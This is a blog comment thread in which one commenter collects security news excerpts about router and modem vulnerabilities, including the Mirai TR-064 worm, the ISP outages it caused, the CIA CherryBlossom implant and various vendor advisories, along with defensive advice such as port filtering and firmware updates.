    A Mirai-based worm leverages a recently disclosed attack vector to hijack routers and modems. Researchers determined that a large number of devices around the world could be vulnerable to attacks.

    Numerous devices have been infected by Mirai and many others could easily get compromised. The malware is responsible for some of the largest distributed denial-of-service (DDoS) attacks in history and it has been increasingly used by malicious actors after its source code was leaked.

    Researchers at BadCyber were recently contacted by an individual in Poland who discovered that his Zyxel AMG1202-T10B gateway had been rebooting every 15-20 minutes. An analysis revealed that hackers managed to remotely execute malicious commands on the device by injecting them into the network time protocol (NTP) server name field. The value of the NTP server name is parsed as a command without being validated, leading to an RCE vulnerability.

    The malicious code was inserted into the NTP server name field via the TR-064 protocol, which allows ISPs to manage devices on their networks. The problem is that some devices are configured to accept TR-064 commands from the Internet, allowing attackers to abuse the feature for malicious activities.

    Researchers warned earlier this month that TR-064 commands can be sent to D1000 modems provided by Ireland-based ISP Eir.

    A Shodan search showed that tens of thousands of D1000 modems are affected. BadCyber conducted its own search and found more than 5 million devices exposing the TR-064 service, with a majority located in Brazil, India, the UK and various other European countries.

    The SANS Institute’s Internet Storm Center has also observed attack attempts on port 7547, the port used by TR-064. The organization identified roughly 41 million devices with the 7547 port open and its honeypots receive a request every 5-10 minutes.

    Reply
  27. Tomi Engdahl says:

    @danimo @hanno @esizkur Its not just Zyxel. I’ve found T-Com, MitraStar, D-Link, Aztech, Digicom, Comtrend, ZTE…

    Currently listing 48 devices vulnerable to the main TR-064/TR-069 issue. Scans will reveal more. Not scanning for the cmd inject though.

    Source: https://twitter.com/info_dox/status/803244427300978688

    Reply
  28. Tomi Engdahl says:

    Worldwide, there are an estimated millions of devices captured members of the Mirai-botnet. Among them are more than ten thousand Finns device.

    Effects users

    Malware infection detection by the user, is difficult. The malware can slow down the operation of the device or prevent its normal use altogether. Contaminated equipment likely to be involved in the user’s knowledge, for example, denial of service attacks and to use the interface capacity.

    The open home routers to the Internet service enables remote exploit the device to be contaminated. After contamination of the device tends to infect other similar devices and will become part of a bot network. formed hijacked botnets devices are used, for example, denial of service attacks. remote management of devices commonly used TCP port 7547.

    FICORA considers that the conditions for traffic filtering in this case, as defined in the Act have been met and has recommended that telecom operators to filter traffic port TCP / 7547 in order to prevent the exploit. Several telecommunications companies have begun to traffic filtering.

    Currently, there are known the following manufactured Zyxel ADSL modems to be vulnerable. the list below will be updated as new information is obtained vulnerable devices:

    Zyxel AMG1302-T11C
    Zyxel AMG1312-T10B
    Zyxel AMG1202-T10B (no longer marketed) What software

    Zyxel P-660HN-T1A (No longer available)
    Zyxel P660HN-T1Av2 (No longer available)

    It is very likely that the vulnerability applies to other devices.

    The malware is removed, the release also Rebooting and the telecommunications operator’s traffic filtering.

    Sources:
    http://www.tivi.fi/Kaikki_uutiset/yli-10-000-suomalaista-modeemia-kaapattu-nain-estat-mirai-haittaohjelman-toiminnan-6603349
    https://www.viestintavirasto.fi/kyberturvallisuus/varoitukset/2016/varoitus-2016-04.html

    Reply
  29. Tomi Engdahl says:

    Sh… IoT just got real: Mirai botnet attacks targeting multiple ISPs
    Now ZyXEL and D-Link routers from Post Office and TalkTalk under siege
    http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/

    The Mirai botnet has struck again, with hundreds of thousands of TalkTalk and Post Office broadband customers affected. The two ISPs join a growing casualty list from a wave of assaults that have also affected customers at Deutsche Telekom, KCOM and Irish telco Eir over the last two weeks or so.

    Problems at the Post Office and TalkTalk both began on Sunday and collectively affected hundreds of thousands of surfers. Similar attacks against thousands of KCOM broadband users around Hull that started about the same time targeted users of telco-supplied routers. Thousands of punters at the smaller ISP were left without a reliable internet connection as a result of the assault, which targeted routers from Taiwanese manufacturer ZyXEL.

    It’s unclear who is responsible for the growing string of attacks on ISP customers across Europe or their motives. The mechanism of the attack is, however, all too clear. Hackers are using the infamous Mirai malware or one of its derivatives to wreak havoc. The IoT malware scans for telnet before attempting to hack into vulnerable devices, using a brute-force attack featuring 61 different user/password combinations, the various default settings of kit from various manufacturers. Up to 5m devices are up for grabs thanks to wide open management ports, according to some estimates.

    Jean-Philippe Taggart, senior security researcher at Malwarebytes, said: “The leaked Mirai code, poorly secured remote administration on IoT devices, coupled with the recent availability of a Metasploit module to automate such attacks make for an ideal botnet recruitment campaign.

    “So far, it seems the infection does not survive a reboot, but the malicious actors tend to disable access to the remote administration as part of the infection. This prevents the ISP from applying an update that would solve these issues. The botnet gains a longer life as users seldom reboot their routers unless they’re experiencing a problem.”

    Other experts imply further attacks along the same lines are inevitable because the state of router security is poor and unlikely to improve any time soon.

    “The current state of IoT security is in bad shape, and will get a whole lot worse before it gets any better. The Mirai botnet, which is powered by 100,000 IoT devices that are insecure by default, is just the most obvious and topical example.”

    Reply
  30. Tomi Engdahl says:

    TR-069 NewNTPServer Exploits: What we know so far
    https://isc.sans.edu/forums/diary/TR069+NewNTPServer+Exploits+What+we+know+so+far/21763/

    What is “TR-069″

    TR-069 (or its earlier version TR-064) is a standard published by the Broadband Forum. The Broadband Forum is an industry organization defining standards used to manage broadband networks. It focuses heavily on DSL type modems and more recently included fiber optic connections. “TR” stands for “Technical Report”. TR-069 is considered the Broadband Forum’s “Flagship Standard”. [1] Many ISPs and device manufacturers are members of the broadband forum.

    TR-069 allows ISPs to manage modems remotely. Port 7547 has been assigned to this protocol. Some devices appear to use port 5555 instead. I haven’t found a standard defining port 5555 for this use, but it may be an older version. The standard suggests the use of TLS 1.2 but doesn’t require it, and TLS would not have made a difference in this case. Authentication can happen via certificates, or

    TR-069 messages are encoded using SOAP. These SOAP requests include a message that is then parsed by the modem (CPE, “Consumer Premise Equipment). The standard defines a large range of required and optional features.

    The Vulnerability & Exploit

    On November 7th, 2016, “kenzo2017″ posted a blog post showing how the TR-064 “NewNTPServer” feature can be used to execute arbitrary commands. The blog post mentioned only the D1000 modem used by Irish ISP Eir as vulnerable [2].

    Deutsche Telekom Outage

    On Sunday, November 27th, 2016, a large number of Deutsche Telekom customers reported connectivity problems. These issues were later traced to attacks against a particular type of modem. Deutsche Telekom uses the brand name “Speedport” for its modems, but the modems themselves are manufactured by different companies. Deutsche Telekom lists the Speedport W 921 V, 723V Typ B, and 921 Fiber as affected. All of these modems are made by Taiwanese company Acadyan, which does not appear to be connected to Zyxel, the maker of the vulnerable Eir modem.

    Deutsche Telekom rolled out a firmware update to fix the vulnerability exploited by the attack. There has been no official statement from Deutsche Telekom confirming that the TR-069 attack was used to crash the modem. However, Deutsche Telekom did state that an “coding error” in the exploit caused the modems to crash instead of run the exploit code.

    Increase in Scans for Port 7547

    Around the time the outage in Germany, we did notice a substantial increase in the number of attacks against port 7547. Later, a similar increase was noted on %%port:5555%.

    Countermeasures

    As a consumer, if you suspect that your modem is vulnerable or worse, exploited: Reboot your modem and check on firmware updates. For some ISPs, like Deutsche Telekom, firmware updates are avaialbe. But you will typically receive the firmware from your ISP, not the modem’s manufacturer. ISPs customize firmware, like for example by enabling TR-069, and a “default” manufacturer provided firmware may not work for you.

    ISPs should (and typically will) restrict access to port 7547 and port 5555 if it is used for remote configuration. Modem should only accept connections from specific configuration servers. TR-069 implementations had vulnerabilities in the past, and it is very likely that additional issues will be found in the future. Restricting access to the port is necessary to protect the modem from exploits against unpatched vulnerabilities.

    How Many Modems Are Vulnerable?

    The number of devices listening on port 7547 is as larger as 40 Million according to counts performed with Shodan. But not all these modems may run vulnerable implementations, and some may only accept commends from specific servers. It is difficult to say which modems are vulnerable and which once are safe. My personal “best guess” is that this vulnerability may have added 1-2 Million new bots to the Mirai botnet. We do have about 600,000 source IPs scanning for this vulnerability in our database. But many of them may have been infected by Mirai via weak passwords. For a small number of sources that responded on Port 443, we connected and retrieved TLS certificates. The overwhelming portion of certificates where issues by Zyxel, indicating that it is infected Zyxel devices that are participating in the scanning.

    What’s Next?

    At this point, the newly infected systems are just used to scan for more victims. But it is probably just a matter of time until they are used for DDoS attacks.

    Reply
  31. Tomi Engdahl says:

    100,000 UK Routers Likely Affected by Mirai Variant
    http://www.securityweek.com/100000-uk-routers-likely-affected-mirai-variant

    Approximately 100,000 UK TalkTalk and Post Office ISP users were affected by the recent Mirai attack that severely affected nearly a million Deutsche Telekom customers in Germany in late November. It was assumed that the UK victims were the outer ripples of the primary attack; and this was confirmed by a subsequent report that quoted the Mirai developer as apologizing for the effect on the Post Office. The UK disruption was apparently an accident and not done intentionally.

    This version of events is now questioned by the findings of Pen Test Partners. Senior consultant Andrew Tierney reported Friday that the effect on TalkTalk routers was different to the effect on Deutsche Telekom routers. “We can’t see what is causing the claimed ISP outages for TalkTalk and the Post Office reported in the press. It shouldn’t stop the router routing, and as of yet, the bots haven’t taken part in any attacks.”

    Pen Test Partners concluded, “Whilst the spread and purpose of the bot net is similar to Mirai, there are enough differences with this variant that it should really get a new name.”

    TR-064 worm. It’s not Mirai and the outages are interesting
    https://www.pentestpartners.com/blog/tr-064-worm-its-not-mirai-and-the-outages-are-interesting/

    We’ve been looking at the code behind the worm that’s exploiting TalkTalk, PostOffice and many other Zyxel routers using the Allegro RomPager HTTP server.

    What’s odd is that we can’t currently see why it’s causing outages, other than perhaps collapsing under the congestion of scanning for more vulnerable routers.

    The vulnerability is fairly simple, and relies on a series of mistakes.

    Port 7547 is open on these routers to listen for a “knock” to tell them to connect back to a provisioning server. It’s meant to be exposed to the WAN side of the router. This is part of TR-069, which has been discussed a lot in the past.

    Curiously, it also appears that TR-064 is also available on port 7547. TR-064 is called “LAN-Side DSL CPE Configuration”, and unsurprisingly, is only meant to be exposed on the LAN side of the router.

    The TR-064 specification requires authentication, but this seems to be missing.

    Reply
  32. Tomi Engdahl says:

    TalkTalk’s wi-fi hack advice is ‘astonishing’
    http://www.bbc.com/news/technology-38223805

    TalkTalk’s handling of a wi-fi password breach is being criticised by several cyber-security experts.

    The BBC has presented the company with evidence that many of its customers’ router credentials have been hacked, putting them at risk of data theft.

    The UK broadband provider confirmed that the sample of stolen router IDs it had been shown was real.

    But it is still advising users that there is “no need” to change their routers’ settings.

    A cyber-security advisor to Europol said he was astounded by the decision.

    “If TalkTalk has evidence that significant numbers of passwords are out in the wild, then at the very least they should be advising their customers to change their passwords,” said the University of Surrey’s Prof Alan Woodward.

    “To say they see no need to do so is, frankly, astonishing.”

    A spokeswoman for TalkTalk said that customers could change their settings “if they wish” but added that she believed there was “no risk to their personal information”.

    She referred the BBC to another security expert. But when questioned, he also said the company should change its advice.

    The BBC was subsequently contacted by someone who said he had access to a database of 57,000 router IDs that had been scraped before any fix had been rolled out.

    He did not reveal his identity, but agreed to share a sample of the credentials that had been harvested.

    The list contained details of about 100 routers including:

    their service set identifier (SSID) codes and media access control (MAC) addresses. These can be entered into online tools that reveal the physical location of the routers
    the router passwords, which would allow someone who travelled to the identified property to access the wi-fi network

    The source said he wanted to highlight the problem because other more malevolent actors might have carried out a similar operation.

    Prof Alan Woodward said once a hacker was outside a vulnerable property, they could:

    snoop in the resident’s data, which might be clearly visible or encrypted in ways that still allowed the original information to be easily recovered
    use the internet connection to mount an onward attack. The hacker could do this to hide their own identity or to co-opt the router to join an army of other compromised equipment in later DDoS (distributed denial of service) attacks
    log in to the router as the administrator and mount a “man in the middle attack”, where apparently secure communications could be listened in on
    substitute the router’s firmware with a modified version that provided a backdoor for later access even if the device was reset

    ‘Fast and loose’

    TalkTalk’s spokeswoman referred the BBC to Steve Armstrong, a cyber-security instructor that she said would support it on the matter.

    He said the risk to an individual user was relatively low.

    “If you look at the average home user and what is on their home network, that would be exposed to an attacker,… then there is not a great deal.

    “The risk is probably no higher than using a [coffee shop's] open wi-fi network.”

    But he added that he still felt TalkTalk was giving the wrong advice.

    “Part of my pushback to them is that they should be telling people, ‘You need to change your password,’” he said.

    Reply
  33. Tomi Engdahl says:

    Netgear Patches RCE Flaws in Routers, Switches
    http://www.securityweek.com/netgear-patches-rce-flaws-routers-switches

    Netgear recently informed customers that it has released firmware updates for some of its routers and switches to address remote code execution and other types of vulnerabilities.

    Netgear announced the launch of a bug bounty program in early January and the company has been regularly publishing security advisories and notifications over the past months. The firm has been offering between $150 and $15,000 for responsibly disclosed vulnerabilities, and it already claims to have rewarded more than 150 bug reports.

    In the most recent advisories, Netgear informed users about the existence of CVE-2017-6862, a buffer overflow vulnerability that can be exploited by a remote attacker to bypass authentication and execute arbitrary commands.

    The flaw, discovered by Maxime Peterlin of ON-X, affects WNR2000v3, WNR2000v4, WNR2000v5 and R2000 routers. Firmware updates that patch the vulnerability are available for all impacted models.

    Security Advisory for Authentication Bypass and Remote Command Execution on Some Smart and Managed Switches, PSV-2017-0857
    https://kb.netgear.com/000038519/Security-Advisory-for-Authentication-Bypass-and-Remote-Command-Execution-on-Some-Smart-and-Managed-Switches-PSV-2017-0857

    Reply
  34. Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    WikiLeaks documents show how CIA infected WiFi routers from 10 manufacturers including D-Link and Linksys to monitor and manipulate traffic, infect more devices

    Advanced CIA firmware has been infecting Wi-Fi routers for years
    Latest Vault7 release exposes network-spying operation CIA kept secret since 2007.
    https://arstechnica.com/security/2017/06/advanced-cia-firmware-turns-home-routers-into-covert-listening-posts/

    Home routers from 10 manufacturers, including Linksys, DLink, and Belkin, can be turned into covert listening posts that allow the Central Intelligence Agency to monitor and manipulate incoming and outgoing traffic and infect connected devices. That’s according to secret documents posted Thursday by WikiLeaks.

    CherryBlossom, as the implant is code-named, can be especially effective against targets using some D-Link-made DIR-130 and Linksys-manufactured WRT300N models because they can be remotely infected even when they use a strong administrative password. An exploit code-named Tomato can extract their passwords as long as a default feature known as universal plug and play remains on. Routers that are protected by a default or easily-guessed administrative password are, of course, trivial to infect. In all, documents say CherryBlossom runs on 25 router models, although it’s likely modifications would allow the implant to run on at least 100 more.

    The 175-page CherryBlossom user guide describes a Linux-based operating system that can run on a broad range of routers. Once installed, CherryBlossom turns the device into a “FlyTrap” that beacons a CIA-controlled server known as a “CherryTree.” The beacon includes device status and security information that the CherryTree logs to a database. In response, the CherryTree sends the infected device a “Mission” consisting of specific tasks tailored to the target. CIA operators can use a “CherryWeb” browser-based user interface to view Flytrap status and security information, plan new missions, view mission-related data, and perform system administration tasks.

    SRI-SLO-FF-2012-177-CherryBlossom_UsersManual_CDRL-12_SLO-FF-2012-171
    https://wikileaks.org/vault7/document/SRI-SLO-FF-2012-177-CherryBlossom_UsersManual_CDRL-12_SLO-FF-2012-171/

    Reply
  35. Tomi Engdahl says:

    Serious Vulnerabilities Disclosed in Modems Used by AT&T’s U-verse Service
    http://www.securityweek.com/serious-vulnerabilities-disclosed-modems-used-atts-u-verse-service

    Five vulnerabilities have been found in Arris-manufactured home networking equipment supplied in AT&T’s U-verse service. The vulnerabilities are considered so trivial to exploit that they have been disclosed to the public without waiting for remedial work from either Arris or AT&T.

    On one of the vulnerabilities, Joseph Hutchins of Nomotion Software reported yesterday, “It is hard to believe that no one is already exploiting this vulnerability at the detriment of innocents. Which is why this report is not passing Go, not collecting $200, and is going straight to the public domain.”

    Arris has said that it is investigating the claims and cannot yet comment; but that it will take any necessary action to protect users of its devices.

    It is worth noting that Arris is not a stranger to vulnerabilities — a talk “CableTap: Wireless Tapping Your Home Network” was recently delivered at Def Con.

    Right now, U-verse users should be aware that these are serious vulnerabilities. Tod Beardsley, Research Director at Rapid7, told SecurityWeek by email, they “include three separate maintenance interfaces over SSH and two hidden HTTP-based services, all of which are reachable from the internet with hard-coded credentials and susceptible to command injection attacks. In addition, Nomotion discovered an unauthenticated firewall bypass vulnerability, which appears to be a rudimentary reverse TCP proxy, allowing unfettered access from the internet to computers on the LAN side. Any one of these vulnerabilities is disastrous for AT&T U-Verse customers, since they ultimately bypass any security controls offered by these modems.”

    Reply
  36. Tomi Engdahl says:

    Judge Kills FTC Lawsuit Against D-Link for Flimsy Security
    https://yro.slashdot.org/story/17/09/21/1744203/judge-kills-ftc-lawsuit-against-d-link-for-flimsy-security

    Earlier this year, the Federal Trade Commission filed a complaint against network equipment vendor D-Link saying inadequate security in the company’s wireless routers and internet cameras left consumers open to hackers and privacy violations. The FTC, in a complaint filed in the Northern District of California charged that “D-Link failed to take reasonable steps to secure its routers and Internet Protocol (IP) cameras, potentially compromising sensitive consumer information, including live video and audio feeds from D-Link IP cameras.”

    Fast forward nine months, a judge has dismissed the FTC’s case, claiming that the FTC failed to provide enough specific examples of harm done to consumers, or specific instances when the routers in question were breached.

    story category
    Judge Kills FTC Lawsuit Against D-Link for Flimsy Security
    http://www.dslreports.com/shownews/Judge-Kills-FTC-Lawsuit-Against-DLink-for-Flimsy-Security-140369

    Reply
  37. Tomi Engdahl says:

    D-Link Patches Recently Disclosed Router Vulnerabilities
    http://www.securityweek.com/d-link-patches-recently-disclosed-router-vulnerabilities

    D-Link has released firmware updates for its DIR-850L router to address a majority of the vulnerabilities disclosed recently by a security researcher.

    Earlier this month, researcher Pierre Kim disclosed the details of several flaws affecting D-Link DIR-850L routers and the company’s mydlink cloud services. The expert decided to make his findings public without giving D-Link time to release fixes due to the way the vendor had previously handled patching and coordination.

    D-Link has now released updates for both revision A and B of the firmware for DIR-850L devices. The company has provided detailed instructions for updating the firmware, which it says is a two-step process.

    The vulnerabilities found by Kim include the lack of firmware protections, cross-site scripting (XSS), denial-of-service (DOS), and weaknesses that can be exploited to execute arbitrary commands.

    D-Link also announced this week that a federal judge has dismissed three of the six counts in a complaint filed in January by the U.S. Federal Trade Commission (FTC) against the company over its alleged failure to implement proper security measures and making deceptive claims about the security of its products.

    Reply
  38. Tomi Engdahl says:

    Germany on Guard Against Election Hacks, Fake News
    http://www.securityweek.com/germany-guard-against-election-hacks-fake-news

    As the clock ticks down to elections Sunday, Germany’s cyber defense nervously hopes it’ll be third time lucky after Russia was accused of meddling in the US and French votes.

    But even if Berlin avoids a last-minute bombshell of leaks or online sabotage, it sees Moscow’s hand in fanning fears of Muslim migrants that are driving the rise of the hard-right.

    Forecasters say Chancellor Angela Merkel is almost certain to win.

    But she will also face, for the first time in German post-war history, a right-wing populist and anti-immigration party will have its own group on the opposition benches.

    Reply
  39. Tomi Engdahl says:

    Insteon and Wink home hubs appear to have a problem with encryption
    Which is to say neither do it
    https://www.theregister.co.uk/2017/09/25/home_hub_insecurity/

    Security researchers have discovered that two popular home automation systems are vulnerable to attacks.

    The Insteon Hub and Wink Hub 2 are designed to connect various home products and manage automation, and the flaws represent another entry in the growing catalogue of IoT security shortcomings.

    Rapid7 discovered two unpatched issues related to authentication and radio transmission security of the Insteon Hub. Firstly the account login and passwords for both Insteon services and the Hub hardware are stored unencrypted. In addition the radio transmissions between the hub and connected devices are unencrypted. This means malicious actors can easily capture the radio signals at any time to manipulate any device being managed via the Insteon Hub.

    Reply
  40. Tomi Engdahl says:

    Mirai Variant “Satori” Targets Huawei Routers
    http://www.securityweek.com/mirai-variant-satori-targets-huawei-routers

    Hundreds of thousands of attempts to exploit a recently discovered vulnerability in Huawei HG532 home routers have been observed over the past month, Check Point security researchers warn.

    The attacks were trying to drop Satori, an updated variant of the notorious Mirai botnet that managed to wreak havoc in late 2016. Targeting port 37215 on Huawei HG532 devices, the assaults were observed all around the world, including the USA, Italy, Germany and Egypt, the researchers say.

    Common to these incidents was the attempt to exploit CVE-2017-17215, a zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed and intended for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

    The affected device supports a service type named `DeviceUpgrade`, which is supposedly carrying out firmware upgrade actions. By injecting shell meta-characters “$()” in two elements with which the upgrade is carried out, a remote administrator could execute arbitrary code on the affected devices.

    Reply
  41. Tomi Engdahl says:

    Flaws Affecting Top-Selling Netgear Routers Disclosed
    http://www.securityweek.com/flaws-affecting-top-selling-netgear-routers-disclosed

    Security firm Trustwave has disclosed the details of several vulnerabilities affecting Netgear routers, including devices that are top-selling products on Amazon and Best Buy.

    The flaws were discovered by researchers in March 2017 and they were patched by Netgear in August, September and October.

    One of the high severity vulnerabilities has been described as a password recovery and file access issue affecting 17 Netgear routers and modem routers, including best-sellers such as R6400, R7000 (Nighthawk), R8000 (Nighthawk X6), and R7300DST (Nighthawk DST).

    Reply
  42. Tomi Engdahl says:

    ‘Slingshot’ Malware That Hid For Six Years Spread Through Routers
    https://it.slashdot.org/story/18/03/12/2034219/slingshot-malware-that-hid-for-six-years-spread-through-routers

    Security researchers at Kaspersky Lab have discovered what’s likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers. It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves.

    Sophisticated malware attacks through routers
    It’s likely the creation of a government surveillance agency.
    https://www.engadget.com/2018/03/11/sophisticated-malware-attacks-through-routers/

    Security researchers at Kaspersky Lab have discovered what’s likely to be another state-sponsored malware strain, and this one is more advanced than most. Nicknamed Slingshot, the code spies on PCs through a multi-layer attack that targets MikroTik routers. It first replaces a library file with a malicious version that downloads other malicious components, and then launches a clever two-pronged attack on the computers themselves. One, Canhadr, runs low-level kernel code that effectively gives the intruder free rein, including deep access to storage and memory; the other, GollumApp, focuses on the user level and includes code to coordinate efforts, manage the file system and keep the malware alive.

    Kaspersky describes these two elements as “masterpieces,” and for good reason. For one, it’s no mean feat to run hostile kernel code without crashes. Slingshot also stores its malware files in an encrypted virtual file system, encrypts every text string in its modules, calls services directly (to avoid tripping security software checks) and even shuts components down when forensic tools are active.

    Reply
  43. Tomi Engdahl says:

    Remotely Exploitable Vulnerability Discovered in MikroTik’s RouterOS
    https://www.securityweek.com/remotely-exploitable-vulnerability-discovered-mikrotiks-routeros

    A vulnerability exists in MikroTik’s RouterOS in versions prior to the latest 6.41.3, released Monday, March 12, 2018. Details were discovered February and disclosed by Core Security on Thursday.

    MikroTik is a Latvian manufacturer that develops routers and software used throughout the world. RouterOS is its Linux-based operating system.

    The vulnerability, a MikroTik RouterOS SMB buffer overflow flaw, allows a remote attacker with access to the service to gain code execution on the system. Since the overflow occurs before authentication, an unauthenticated remote attacker can exploit it.

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*